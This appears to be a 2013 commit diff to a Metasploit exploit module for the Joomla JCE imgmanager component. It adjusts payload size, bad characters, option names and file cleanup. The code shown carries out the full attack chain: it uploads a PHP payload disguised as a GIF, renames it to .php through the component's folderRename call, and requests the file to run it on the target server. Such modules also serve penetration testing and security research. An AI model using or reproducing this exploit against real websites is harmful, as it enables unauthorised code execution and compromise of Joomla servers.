Adjust payload size and others code adjustments

HeyderAndrade · HeyderAndrade · commit 50ac5cf24709 · 2013-03-24T20:25:29.000-03:00
diff --git a/modules/exploits/multi/http/joomla_comjce_imgmanager.rb b/modules/exploits/multi/http/joomla_comjce_imgmanager.rb
@@ -31,33 +31,35 @@ def initialize(info = {})
 					['BID', '49338'],
 					['EDB', '17734'],
 				],
-			'Privileged'     => false,
 			'Payload'        =>
 				{
-					'Keys'        => ['php'],
-					'DisableNops' => true,
+                    'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
+                    'DisableNops' => true,
+                    'BadChars'    => "#",
+                    'Keys'        => ['php'],
 					'Compat'      =>
 						{
 							'ConnectionType' => 'find',
 						},
-					'Space'       => 1024, # default upload max_size
 				},
 			'Platform'       => 'php',
 			'Arch'           => ARCH_PHP,
 			'Targets'        => [[ 'Automatic', { }]],
+			'Privileged'     => false,
 			'DisclosureDate' => 'Aug 2 2012',
 			'DefaultTarget'  => 0))
 
 			register_options(
 				[
-					OptString.new('URI', [true, "Joomla directory path", "/"])
+					OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
 				], self.class)
 	end
 
 
 	def get_version
 		# check imgmanager version
-		@uri_base = normalize_uri(datastore['URI']) + 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager'
+		#uri = normalize_uri(target_uri.path.to_s, "images", "stories", "#{@script_name}.php")
+		@uri_base = normalize_uri(target_uri.path.to_s) + 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager'
 		uri =  @uri_base
 		print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
 		res = send_request_cgi(
@@ -94,9 +96,7 @@ def upload_gif
 		# Generate some random strings
 		@script_name  	= rand_text_alpha_lower(6)
 		boundary   		= '-' * 27 + rand_text_numeric(11)
-
-		uri = @uri_base
-		uri << '&method=form'
+        uri = normalize_uri(@uri_base) + '&method=form'
 
 		# POST data
 		post_data = Rex::MIME::Message.new
@@ -132,9 +132,7 @@ def upload_gif
 
 	def renamed?
 		# Rename the file from .gif to .php
-#		uri = ''
-		uri = @uri_base
-		uri << '&version=1576&cid=20'
+		uri = normalize_uri(@uri_base) #, '&version=1576&cid=20')
 
 		data =	"json={\"fn\":\"folderRename\",\"args\":[\"/#{@script_name}.gif\",\"#{@script_name}.php\"]}"
 
@@ -164,8 +162,10 @@ def renamed?
 	def call_payload
 		directory   = 'images/stories/'
 		print_status("Calling payload: #{@script_name}.php")
-		uri = normalize_uri(datastore['URI'])
-		uri << directory + @script_name + ".php"
+		uri = normalize_uri(target_uri.path.to_s)
+	    uri << directory + @script_name + ".php"
+		register_files_for_cleanup(uri)
+
 		res = send_request_cgi({
 			'uri'	=> uri,
 			'method'    => 'GET',
@@ -183,7 +183,6 @@ def exploit
 		if upload_gif == :success
 			if renamed?
 				call_payload
-				register_files_for_cleanup(@script_name)
 			end
 		end
 
